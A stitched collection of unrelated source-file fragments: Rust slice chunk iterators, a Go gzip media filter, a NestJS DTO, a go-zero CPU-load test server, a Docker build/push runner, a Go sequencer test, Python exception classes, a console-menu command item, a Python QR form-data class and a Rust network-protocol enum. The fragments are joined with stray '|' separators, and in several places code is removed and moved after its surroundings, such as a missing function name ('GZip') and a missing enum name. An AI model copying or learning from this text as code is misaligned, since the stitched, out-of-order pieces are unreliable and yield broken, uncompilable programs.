/// let iter = slice.rchunks_exact(2);
/// ```
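///
/// Continuing the example above (an illustrative addition): only complete
/// chunks are yielded, and the leftover front elements land in [`remainder`]:
///
/// ```
/// let slice = ['l', 'o', 'r', 'e', 'm'];
/// let mut iter = slice.rchunks_exact(2);
/// assert_eq!(iter.next(), Some(&['e', 'm'][..]));
/// assert_eq!(iter.next(), Some(&['o', 'r'][..]));
/// assert_eq!(iter.next(), None);
/// assert_eq!(iter.remainder(), &['l']);
/// ```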
///
/// [`rchunks_exact`]: ../../std/primitive.slice.html#method.rchunks_exact
/// [`remainder`]: RChunksExact::remainder
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "rchunks", since = "1.31.0")]
pub struct RChunksExact<'a, T: 'a> {
v: &'a [T],
rem: &'a [T],
chunk_size: usize,
}
impl<'a, T> RChunksExact<'a, T> {
#[inline]
pub(super) fn new(slice: &'a [T], chunk_size: usize) -> Self {
let rem = slice.len() % chunk_size;
// SAFETY: 0 <= rem <= slice.len() by construction above
let (fst, snd) = unsafe { slice.split_at_unchecked(rem) };
Self { v: snd, rem: fst, chunk_size }
}
/// Returns the remainder of the original slice that is not going to be
/// returned by the iterator. The returned slice has at most `chunk_size-1`
/// elements.
#[stable(feature = "rchunks", since = "1.31.0")]
pub fn remainder(&self) -> &'a [T] {
self.rem
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> Clone for RChunksExact<'a, T> {
fn clone(&self) -> RChunksExact<'a, T> {
RChunksExact { v: self.v, rem: self.rem, chunk_size: self.chunk_size }
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> Iterator for RChunksExact<'a, T> {
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let (fst, snd) = self.v.split_at(self.v.len() - self.chunk_size);
self.v = fst;
Some(snd)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
let n = self.v.len() / self.chunk_size;
(n, Some(n))
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
let (end, overflow) = n.overflowing_mul(self.chunk_size);
if end >= self.v.len() || overflow {
self.v = &[];
None
} else {
let (fst, _) = self.v.split_at(self.v.len() - end);
self.v = fst;
self.next()
}
}
#[inline]
fn last(mut self) -> Option<Self::Item> {
self.next_back()
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let end = self.v.len() - idx * self.chunk_size;
let start = end - self.chunk_size;
        // SAFETY: mostly identical to `Chunks::__iterator_get_unchecked`.
unsafe { from_raw_parts(self.v.as_ptr().add(start), self.chunk_size) }
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> DoubleEndedIterator for RChunksExact<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let (fst, snd) = self.v.split_at(self.chunk_size);
self.v = snd;
Some(fst)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &[];
None
} else {
// now that we know that `n` corresponds to a chunk,
// none of these operations can underflow/overflow
let offset = (len - n) * self.chunk_size;
let start = self.v.len() - offset;
let end = start + self.chunk_size;
let nth_back = &self.v[start..end];
self.v = &self.v[end..];
Some(nth_back)
}
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> ExactSizeIterator for RChunksExact<'a, T> {
fn is_empty(&self) -> bool {
self.v.is_empty()
}
}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for RChunksExact<'_, T> {}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> FusedIterator for RChunksExact<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for RChunksExact<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) mutable chunks (`chunk_size`
/// elements at a time), starting at the end of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last up to
/// `chunk_size-1` elements will be omitted but can be retrieved from the
/// [`into_remainder`] function from the iterator.
///
/// This struct is created by the [`rchunks_exact_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.rchunks_exact_mut(2);
/// ```
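///
/// A sketch of typical use (an illustrative addition): the front element `1`
/// is part of the remainder and stays untouched.
///
/// ```
/// let mut slice = [1, 2, 3, 4, 5];
/// for chunk in slice.rchunks_exact_mut(2) {
///     chunk[1] = 0;
/// }
/// assert_eq!(slice, [1, 2, 0, 4, 0]);
/// ```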
///
/// [`rchunks_exact_mut`]: ../../std/primitive.slice.html#method.rchunks_exact_mut
/// [`into_remainder`]: RChunksExactMut::into_remainder
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "rchunks", since = "1.31.0")]
pub struct RChunksExactMut<'a, T: 'a> {
v: &'a mut [T],
rem: &'a mut [T],
chunk_size: usize,
}
impl<'a, T> RChunksExactMut<'a, T> {
#[inline]
pub(super) fn new(slice: &'a mut [T], chunk_size: usize) -> Self {
let rem = slice.len() % chunk_size;
// SAFETY: 0 <= rem <= slice.len() by construction above
let (fst, snd) = unsafe { slice.split_at_mut_unchecked(rem) };
Self { v: snd, rem: fst, chunk_size }
}
/// Returns the remainder of the original slice that is not going to be
/// returned by the iterator. The returned slice has at most `chunk_size-1`
/// elements.
#[stable(feature = "rchunks", since = "1.31.0")]
pub fn into_remainder(self) -> &'a mut [T] {
self.rem
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> Iterator for RChunksExactMut<'a, T> {
type Item = &'a mut [T];
#[inline]
fn next(&mut self) -> Option<&'a mut [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let tmp = mem::replace(&mut self.v, &mut []);
let tmp_len = tmp.len();
let (head, tail) = tmp.split_at_mut(tmp_len - self.chunk_size);
self.v = head;
Some(tail)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
let n = self.v.len() / self.chunk_size;
(n, Some(n))
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<&'a mut [T]> {
let (end, overflow) = n.overflowing_mul(self.chunk_size);
if end >= self.v.len() || overflow {
self.v = &mut [];
None
} else {
let tmp = mem::replace(&mut self.v, &mut []);
let tmp_len = tmp.len();
let (fst, _) = tmp.split_at_mut(tmp_len - end);
self.v = fst;
self.next()
}
}
#[inline]
fn last(mut self) -> Option<Self::Item> {
self.next_back()
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let end = self.v.len() - idx * self.chunk_size;
let start = end - self.chunk_size;
// SAFETY: see comments for `RChunksMut::__iterator_get_unchecked`.
unsafe { from_raw_parts_mut(self.v.as_mut_ptr().add(start), self.chunk_size) }
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<'a, T> DoubleEndedIterator for RChunksExactMut<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(self.chunk_size);
self.v = tail;
Some(head)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &mut [];
None
} else {
// now that we know that `n` corresponds to a chunk,
// none of these operations can underflow/overflow
let offset = (len - n) * self.chunk_size;
let start = self.v.len() - offset;
let end = start + self.chunk_size;
let (tmp, tail) = mem::replace(&mut self.v, &mut []).split_at_mut(end);
let (_, nth_back) = tmp.split_at_mut(start);
self.v = tail;
Some(nth_back)
}
}
}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> ExactSizeIterator for RChunksExactMut<'_, T> {
fn is_empty(&self) -> bool {
self.v.is_empty()
}
}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for RChunksExactMut<'_, T> {}
#[stable(feature = "rchunks", since = "1.31.0")]
impl<T> FusedIterator for RChunksExactMut<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for RChunksExactMut<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for Iter<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for IterMut<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
| {
self.iter.size_hint()
} |
zip.go | // Copyright 2021 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// https://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package filter
import (
"compress/gzip"
"context"
"io"
"net/http"
)
// GZip applies gzip encoding to the media.
//
// This is an example of a streaming filter. This will use very little memory
// and add very little latency to responses.
func | (ctx context.Context, handle MediaFilterHandle) error {
defer handle.input.Close()
defer handle.output.Close()
// delete content-length header. It is no longer accurate.
handle.response.Header().Del("Content-Length")
// add a content-encoding
handle.response.Header().Set("Content-Encoding", "gzip")
// zip the content
gz, err := gzip.NewWriterLevel(handle.output, 6)
if err != nil {
return FilterError(handle, http.StatusInternalServerError, "zip filter: %v", err)
}
defer gz.Close()
	if _, err := io.Copy(gz, handle.input); err != nil {
		return FilterError(handle, http.StatusInternalServerError, "zip filter: %v", err)
	}
return nil
}
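// Illustrative sketch (not part of the original file): invoking the filter
// from a handler. Assumes MediaFilterHandle carries the reader, writer, and
// ResponseWriter as its input/output/response fields, as used above.
//
//	handle := MediaFilterHandle{input: body, output: out, response: w}
//	if err := GZip(r.Context(), handle); err != nil {
//		// handle the error
//	}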
| GZip |
create-category.dto.ts | import { OmitType, PartialType } from '@nestjs/swagger';
import { Category } from '../entities/category.entity'; |
export class CreateCategoryDto extends PartialType(OmitType(Category, ['id', 'user', 'tasks'])) { } |
|
server.go | package main
import (
"fmt"
"net/http"
"runtime"
"time"
"zero/core/fx"
"zero/core/logx"
"zero/core/service"
"zero/core/stat"
"zero/rest"
)
const duration = time.Millisecond
func main() {
go func() {
ticker := time.NewTicker(time.Second)
defer ticker.Stop()
for range ticker.C {
fmt.Printf("cpu: %d\n", stat.CpuUsage())
}
}()
logx.Disable()
engine := rest.MustNewServer(rest.RestConf{
ServiceConf: service.ServiceConf{
Log: logx.LogConf{
Mode: "console",
},
},
Host: "0.0.0.0",
Port: 3333,
CpuThreshold: 800,
})
defer engine.Stop()
engine.AddRoute(rest.Route{
Method: http.MethodGet,
Path: "/",
Handler: func(w http.ResponseWriter, r *http.Request) {
if err := fx.DoWithTimeout(func() error {
job(duration)
return nil
}, time.Millisecond*100); err != nil {
w.WriteHeader(http.StatusServiceUnavailable)
}
},
})
engine.Start()
}
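// job saturates every CPU core with busy-looping goroutines for roughly
// `duration`, simulating load so that the CpuThreshold-based shedding
// configured above can kick in. (Descriptive comment added for clarity;
// not part of the original file.)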
func job(duration time.Duration) | {
done := make(chan int)
for i := 0; i < runtime.NumCPU(); i++ {
go func() {
for {
select {
case <-done:
return
default:
}
}
}()
}
time.Sleep(duration)
close(done)
} |
|
docker.go | // Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
// Package docker provides an interface to the system's Docker daemon.
package docker
import (
"fmt"
"path/filepath"
"sort"
"strings"
"github.com/aws/copilot-cli/internal/pkg/term/command"
)
// Runner represents a command that can be run.
type Runner struct {
runner
}
type runner interface {
Run(name string, args []string, options ...command.Option) error
}
// New returns a Runner.
func New() Runner {
return Runner{
runner: command.New(),
}
}
// BuildArguments holds the arguments we can pass in as flags from the manifest.
type BuildArguments struct {
URI string // Required. Location of ECR Repo. Used to generate image name in conjunction with tag.
ImageTag string // Required. Tag to pass to `docker build` via -t flag. Usually Git commit short ID.
Dockerfile string // Required. Dockerfile to pass to `docker build` via --file flag.
Context string // Optional. Build context directory to pass to `docker build`
Args map[string]string // Optional. Build args to pass via `--build-arg` flags. Equivalent to ARG directives in dockerfile.
AdditionalTags []string // Optional. Additional image tags to pass to docker.
	Builder        string            // Optional. Cloud Native Buildpacks builder; when set, Build uses `pack` instead of `docker build`.
	Env            map[string]string // Optional. Environment variables passed to the buildpack via `--env` flags.
}
// Build will run a `docker build` command with the input uri, tag, and Dockerfile path.
func (r Runner) Build(in *BuildArguments) error {
if in.Builder != "" {
args := []string{"build"}
args = append(args, imageName(in.URI, "latest"))
args = append(args, "--builder", in.Builder)
dfDir := in.Context
if dfDir != "" {
args = append(args, "--path", dfDir)
}
// Build env arguments
var keys []string
for k := range in.Env {
keys = append(keys, k)
}
sort.Strings(keys)
for _, k := range keys {
args = append(args, "--env", fmt.Sprintf("%s=%s", k, in.Env[k]))
}
err := r.Run("pack", args)
if err != nil {
return fmt.Errorf("building image: %w", err)
}
args = []string{"tag", in.URI + ":latest", in.URI + ":" + in.ImageTag}
err = r.Run("docker", args)
if err != nil {
return fmt.Errorf("building image: %w", err)
}
} else {
dfDir := in.Context
if dfDir == "" { // Context wasn't specified use the Dockerfile's directory as context.
dfDir = filepath.Dir(in.Dockerfile)
}
args := []string{"build"}
// Add additional image tags to the docker build call.
for _, tag := range append(in.AdditionalTags, in.ImageTag) {
args = append(args, "-t", imageName(in.URI, tag))
}
// Add the "args:" override section from manifest to the docker build call
// Collect the keys in a slice to sort for test stability
var keys []string
for k := range in.Args {
keys = append(keys, k)
}
sort.Strings(keys)
for _, k := range keys {
args = append(args, "--build-arg", fmt.Sprintf("%s=%s", k, in.Args[k]))
}
args = append(args, dfDir, "-f", in.Dockerfile)
err := r.Run("docker", args)
if err != nil {
return fmt.Errorf("building image: %w", err)
}
}
return nil
}
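// Illustrative sketch (not part of the original file): a hypothetical Build
// invocation. The URI, tag, and path below are made-up values.
//
//	r := New()
//	err := r.Build(&BuildArguments{
//		URI:        "123456789012.dkr.ecr.us-east-1.amazonaws.com/demo",
//		ImageTag:   "ab12cd3",
//		Dockerfile: "./Dockerfile",
//	})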
// Login will run a `docker login` command against the Service repository URI with the input uri and auth data.
func (r Runner) Login(uri, username, password string) error {
err := r.Run("docker",
[]string{"login", "-u", username, "--password-stdin", uri},
command.Stdin(strings.NewReader(password)))
if err != nil {
return fmt.Errorf("authenticate to ECR: %w", err)
}
return nil
}
// Push will run `docker push` command against the repository URI with the input uri and image tags.
func (r Runner) Push(uri, imageTag string, additionalTags ...string) error {
for _, imageTag := range append(additionalTags, imageTag) {
path := imageName(uri, imageTag)
err := r.Run("docker", []string{"push", path})
if err != nil {
return fmt.Errorf("docker push %s: %w", path, err)
}
}
return nil
}
func | (uri, tag string) string {
return fmt.Sprintf("%s:%s", uri, tag)
}
| imageName |
sequencer_test.go | package sfu
import (
"reflect"
"testing"
"time"
"github.com/stretchr/testify/assert"
)
func Test_sequencer(t *testing.T) {
seq := newSequencer()
off := uint16(15)
for i := uint16(1); i < 520; i++ {
seq.push(i, i+off, 123, 2, true)
}
time.Sleep(60 * time.Millisecond)
req := []uint16{57, 58, 62, 63, 513, 514, 515, 516, 517}
res := seq.getSeqNoPairs(req)
assert.Equal(t, len(req), len(res))
for i, val := range res { | assert.Equal(t, val.getSourceSeqNo(), req[i]-off)
assert.Equal(t, val.getLayer(), uint8(2))
}
res = seq.getSeqNoPairs(req)
assert.Equal(t, 0, len(res))
time.Sleep(150 * time.Millisecond)
res = seq.getSeqNoPairs(req)
assert.Equal(t, len(req), len(res))
for i, val := range res {
assert.Equal(t, val.getTargetSeqNo(), req[i])
assert.Equal(t, val.getSourceSeqNo(), req[i]-off)
assert.Equal(t, val.getLayer(), uint8(2))
}
}
func Test_sequencer_getNACKSeqNo(t *testing.T) {
type args struct {
seqNo []uint16
}
type fields struct {
input []uint16
offset uint16
}
tests := []struct {
name string
fields fields
args args
want []uint16
}{
{
name: "Should get correct seq numbers",
fields: fields{
input: []uint16{2, 3, 4, 7, 8},
offset: 5,
},
args: args{
seqNo: []uint16{4 + 5, 5 + 5, 8 + 5},
},
want: []uint16{4, 8},
},
}
for _, tt := range tests {
tt := tt
t.Run(tt.name, func(t *testing.T) {
n := newSequencer()
for _, i := range tt.fields.input {
n.push(i, i+tt.fields.offset, 123, 3, true)
}
g := n.getSeqNoPairs(tt.args.seqNo)
var got []uint16
for _, sn := range g {
got = append(got, sn.getSourceSeqNo())
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("getSeqNoPairs() = %v, want %v", got, tt.want)
}
})
}
} | assert.Equal(t, val.getTargetSeqNo(), req[i]) |
exceptions.py | # -*- coding: utf-8 -*-
"""Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2020 Caleb Bell <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
This module contains various exception classes that may be raised by chemicals.
For reporting bugs, adding feature requests, or submitting pull requests,
please use the `GitHub issue tracker <https://github.com/CalebBell/chemicals/>`_.
.. contents:: :local:
.. autoclass:: chemicals.exceptions.UnderspecifiedError
.. autoclass:: chemicals.exceptions.OverspeficiedError
.. autoclass:: chemicals.exceptions.TrivialSolutionError
.. autoclass:: chemicals.exceptions.PhaseCountReducedError
.. autoclass:: chemicals.exceptions.PhaseExistenceImpossible
"""
__all__ = ['TrivialSolutionError',
'PhaseCountReducedError',
'PhaseExistenceImpossible',
'UnderspecifiedError',
'OverspeficiedError']
class UnderspecifiedError(Exception):
"""Generic error to raise when not enough values are given."""
class OverspeficiedError(Exception):
"""Generic error to raise when too many values are given."""
class TrivialSolutionError(Exception):
"""Error raised SS converges to trivial solution."""
def __init__(self, message, comp_difference, iterations, err):
|
class PhaseCountReducedError(Exception):
"""Error raised SS inner flash loop says all Ks are under 1 or above 1."""
def __init__(self, message, zs=None, Ks=None):
super().__init__(message)
self.zs = zs
self.Ks = Ks
class PhaseExistenceImpossible(Exception):
"""Error raised SS inner flash loop says all Ks are under 1 or above 1."""
def __init__(self, message, zs=None, T=None, P=None):
super().__init__(message)
self.zs = zs
self.T = T
self.P = P
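# Illustrative sketch (not part of the original file): how a successive
# substitution (SS) flash routine might raise one of these exceptions.
#
#   if all(K > 1.0 for K in Ks) or all(K < 1.0 for K in Ks):
#       raise PhaseCountReducedError("All K values on one side of unity",
#                                    zs=zs, Ks=Ks)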
| super().__init__(message)
self.comp_difference = comp_difference
self.iterations = iterations
self.err = err |
command_item.py | import subprocess
from consolemenu.items import ExternalItem
class CommandItem(ExternalItem):
"""
A menu item to execute a console command
"""
def __init__(self, text, command, arguments=None, menu=None, should_exit=False):
|
def action(self):
"""
This class overrides this method
"""
commandline = "{0} {1}".format(self.command, " ".join(self.arguments))
try:
completed_process = subprocess.run(commandline, shell=True)
self.exit_status = completed_process.returncode
except AttributeError:
self.exit_status = subprocess.call(commandline, shell=True)
def get_return(self):
"""
:return: the exit status of the command
:rtype: int
"""
return self.exit_status
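# Illustrative sketch (not part of the original file): attaching a CommandItem
# to a menu, assuming the standard `consolemenu` entry points.
#
#   from consolemenu import ConsoleMenu
#   menu = ConsoleMenu("Tools")
#   menu.append_item(CommandItem("List files", "ls", arguments=["-la"]))
#   menu.show()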
| """
:ivar str command: The console command to be executed
:ivar list[str] arguments: An optional list of string arguments to be passed to the command
:ivar int exit_status: the exit status of the command, None if it hasn't been run yet
"""
super(CommandItem, self).__init__(text=text, menu=menu, should_exit=should_exit)
self.command = command
if arguments:
self.arguments = arguments
else:
self.arguments = []
self.exit_status = None |
FormData.py | # -*- coding: utf8 -*-
__author__ = 'Aleksandrov Oleg, 4231'
from PDFGenDAOPostgres import PDFGenDAOPostgres
from PDFGenDAOMySQL import PDFGenDAOMySQL
import settings
class FormData:
__dao = None
__qs = []
__small_qr = []
__version = "0.1"
__id_user = "null"
__id_owner = "null"
__id_premise = "null"
__id_meeting = "null"
__fio = "______________________"
__phoneNumber = "______________________" | __houseNumb = '_____'
__apartment = '_______'
__form = '_____________'
__share = '____________'
__formDate = '_________'
__propertyS = '___________'
__css = ''
def __init__(self, id_user, id_meeting):
# init db type
if settings.DB == "mysql":
self.__dao = PDFGenDAOMySQL()
else:
self.__dao = PDFGenDAOPostgres()
# clear date
self.__small_qr = []
self.__qs = []
# get date
self.__id_meeting = str(id_meeting)
self.__id_user = str(id_user)
qs_small_qr = self.__dao.get_question(id_meeting)
for value in qs_small_qr:
self.__small_qr.append('s' + str(value[2]))
self.__qs.append(str(value[0]) + " " +value[1])
if str(self.__dao.check_premise(self.__id_user)[0][0]) != 'None':
result = self.__dao.get_title(id_meeting, id_user)
self.__fio = result[0][2] + " " + result[0][0] + " " + result[0][1]
self.__city = result[0][3]
self.__street = result[0][4]
self.__houseNumb = result[0][5]
self.__apartment = str(result[0][6])
self.__form = str(result[0][8])
self.__share = str(round(result[0][9] * 100 / result[0][10], 2)) + '%'
self.__formDate = str(result[0][11])
self.__propertyS = str(result[0][12])
self.__id_premise = str(result[0][13])
self.__id_owner = str(result[0][14])
self.__css = self.__dao.get_css(id_meeting)
def get_date(self):
return {
"fio": self.__fio,
"city": self.__city,
"street": self.__street,
"houseNumb": self.__houseNumb,
"apartment": self.__apartment,
"phoneNumber": self.__phoneNumber,
"formSeries": self.__form,
"formDateOfIssue": self.__formDate,
"propertyS": self.__propertyS,
"share": self.__share
}
    # version | 0 or 1 | id_user | id_owner | id_premise | id_meeting | page count | and current page number |
def get_big_qr_code_date(self):
return 'b0|' + self.__get_big_qr_code_date()
def get_big_qr_code_date2(self):
return 'b1|' + self.__get_big_qr_code_date()
def __get_big_qr_code_date(self):
return self.__version.ljust(10, ' ') + '|' \
+ self.__id_user.ljust(10, ' ') + '|' \
+ self.__id_owner.ljust(10, ' ') + '|' \
+ self.__id_premise.ljust(10, ' ') + '|' \
+ self.__id_meeting.ljust(10, ' ')
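    # Illustrative worked example (not part of the original file): with version
    # "0.1", user "7", owner "3", premise "12" and meeting "5",
    # get_big_qr_code_date() returns
    # 'b0|0.1       |7         |3         |12        |5         '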
def get_questions(self):
return self.__qs
def get_small_qr_code_date(self):
return self.__small_qr
def get_css(self):
return self.__css[0]
def end(self):
self.__qs = []
self.__small_qr = []
self.__version = "0.1"
self.__id_user = "null"
self.__id_owner = "null"
self.__id_premise = "null"
self.__id_meeting = "null"
self.__fio = "______________________"
self.__phoneNumber = "______________________"
self.__city = '__________'
self.__street = '___________'
self.__houseNumb = '_____'
self.__apartment = '_______'
self.__form = '_____________'
self.__share = '____________'
self.__formDate = '_________'
self.__propertyS = '___________' | __city = '__________'
__street = '___________' |
protocol.rs | use serde::Serialize;
use std::borrow::Cow;
#[derive(Serialize, Debug, PartialEq, Clone)]
#[serde(tag = "type")]
#[allow(non_camel_case_types)]
pub enum | {
HOPOPT,
ICMP,
IGMP,
GGP,
IPV4,
ST,
TCP,
CBT,
EGP,
IGP,
BBN_RCC_MON,
NVP_II,
PUP,
ARGUS,
EMCON,
XNET,
CHAOS,
UDP,
MUX,
DCN_MEAS,
HMP,
PRM,
XNS_IDP,
TRUNK_1,
TRUNK_2,
LEAF_1,
LEAF_2,
RDP,
IRTP,
ISO_TP4,
NETBLT,
MFE_NSP,
MERIT_INP,
DCCP,
ThirdPC,
IDPR,
XTP,
DDP,
IDPR_CMTP,
TPpp,
IL,
IPV6,
SDRP,
IPV6_ROUTE,
IPV6_FRAG,
IDRP,
RSVP,
GRE,
DSR,
BNA,
ESP,
AH,
I_NLSP,
SWIPE,
NARP,
MOBILE,
TLSP,
SKIP,
IPV6_ICMP,
IPV6_NONXT,
IPV6_OPTS,
CFTP,
SAT_EXPAK,
KRYPTOLAN,
RVD,
IPPC,
SAT_MON,
VISA,
IPCV,
CPNX,
CPHB,
WSN,
PVP,
BR_SAT_MON,
SUN_ND,
WB_MON,
WB_EXPAK,
ISO_IP,
VMTP,
SECURE_VMTP,
VINES,
TTP,
IPTM,
NSFNET_IGP,
DGP,
TCF,
EIGRP,
OSPFIGP,
SPRITE_RPC,
LARP,
MTP,
AX_25,
IPIP,
MICP,
SCC_SP,
ETHERIP,
ENCAP,
GMTP,
IFMP,
PNNI,
PIM,
ARIS,
SCPS,
QNX,
A_N,
IPCOMP,
SNP,
COMPAQ_PEER,
IPX_IN_IP,
VRRP,
PGM,
L2TP,
DDX,
IATP,
STP,
SRP,
UTI,
SMP,
SM,
PTP,
ISIS,
FIRE,
CRTP,
CRUDP,
SSCOPMCE,
IPLT,
SPS,
PIPE,
SCTP,
FC,
RSVP_E2E_IGNORE,
MOBILITY,
UDPLITE,
MPLS_IN_IP,
MANET,
HIP,
SHIM6,
WESP,
ROHC,
ETHERNET,
USE,
RESERVED,
OTHER(Cow<'static, str>),
UNKNOWN
}
impl std::fmt::Display for NetworkProtocol {
fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result {
write!(f, "{:?}", self)
// or, alternatively:
// fmt::Debug::fmt(self, f)
}
}
pub fn parse_protocol_id(id: u16) -> NetworkProtocol {
match id {
0 => NetworkProtocol::HOPOPT,
1 => NetworkProtocol::ICMP,
2 => NetworkProtocol::IGMP,
3 => NetworkProtocol::GGP,
4 => NetworkProtocol::IPV4,
5 => NetworkProtocol::ST,
6 => NetworkProtocol::TCP,
7 => NetworkProtocol::CBT,
8 => NetworkProtocol::EGP,
9 => NetworkProtocol::IGP,
10 => NetworkProtocol::BBN_RCC_MON,
11 => NetworkProtocol::NVP_II,
12 => NetworkProtocol::PUP,
13 => NetworkProtocol::ARGUS,
14 => NetworkProtocol::EMCON,
15 => NetworkProtocol::XNET,
16 => NetworkProtocol::CHAOS,
17 => NetworkProtocol::UDP,
18 => NetworkProtocol::MUX,
19 => NetworkProtocol::DCN_MEAS,
20 => NetworkProtocol::HMP,
21 => NetworkProtocol::PRM,
22 => NetworkProtocol::XNS_IDP,
23 => NetworkProtocol::TRUNK_1,
24 => NetworkProtocol::TRUNK_2,
25 => NetworkProtocol::LEAF_1,
26 => NetworkProtocol::LEAF_2,
27 => NetworkProtocol::RDP,
28 => NetworkProtocol::IRTP,
29 => NetworkProtocol::ISO_TP4,
30 => NetworkProtocol::NETBLT,
31 => NetworkProtocol::MFE_NSP,
32 => NetworkProtocol::MERIT_INP,
33 => NetworkProtocol::DCCP,
34 => NetworkProtocol::ThirdPC,
35 => NetworkProtocol::IDPR,
36 => NetworkProtocol::XTP,
37 => NetworkProtocol::DDP,
38 => NetworkProtocol::IDPR_CMTP,
39 => NetworkProtocol::TPpp,
40 => NetworkProtocol::IL,
41 => NetworkProtocol::IPV6,
42 => NetworkProtocol::SDRP,
43 => NetworkProtocol::IPV6_ROUTE,
44 => NetworkProtocol::IPV6_FRAG,
45 => NetworkProtocol::IDRP,
46 => NetworkProtocol::RSVP,
47 => NetworkProtocol::GRE,
48 => NetworkProtocol::DSR,
49 => NetworkProtocol::BNA,
50 => NetworkProtocol::ESP,
51 => NetworkProtocol::AH,
52 => NetworkProtocol::I_NLSP,
53 => NetworkProtocol::SWIPE,
54 => NetworkProtocol::NARP,
55 => NetworkProtocol::MOBILE,
56 => NetworkProtocol::TLSP,
57 => NetworkProtocol::SKIP,
58 => NetworkProtocol::IPV6_ICMP,
59 => NetworkProtocol::IPV6_NONXT,
60 => NetworkProtocol::IPV6_OPTS,
62 => NetworkProtocol::CFTP,
64 => NetworkProtocol::SAT_EXPAK,
65 => NetworkProtocol::KRYPTOLAN,
66 => NetworkProtocol::RVD,
67 => NetworkProtocol::IPPC,
69 => NetworkProtocol::SAT_MON,
70 => NetworkProtocol::VISA,
71 => NetworkProtocol::IPCV,
72 => NetworkProtocol::CPNX,
73 => NetworkProtocol::CPHB,
74 => NetworkProtocol::WSN,
75 => NetworkProtocol::PVP,
76 => NetworkProtocol::BR_SAT_MON,
77 => NetworkProtocol::SUN_ND,
78 => NetworkProtocol::WB_MON,
79 => NetworkProtocol::WB_EXPAK,
80 => NetworkProtocol::ISO_IP,
81 => NetworkProtocol::VMTP,
82 => NetworkProtocol::SECURE_VMTP,
83 => NetworkProtocol::VINES,
//84 => NetworkProtocol::TTP,
84 => NetworkProtocol::IPTM,
85 => NetworkProtocol::NSFNET_IGP,
86 => NetworkProtocol::DGP,
87 => NetworkProtocol::TCF,
88 => NetworkProtocol::EIGRP,
89 => NetworkProtocol::OSPFIGP,
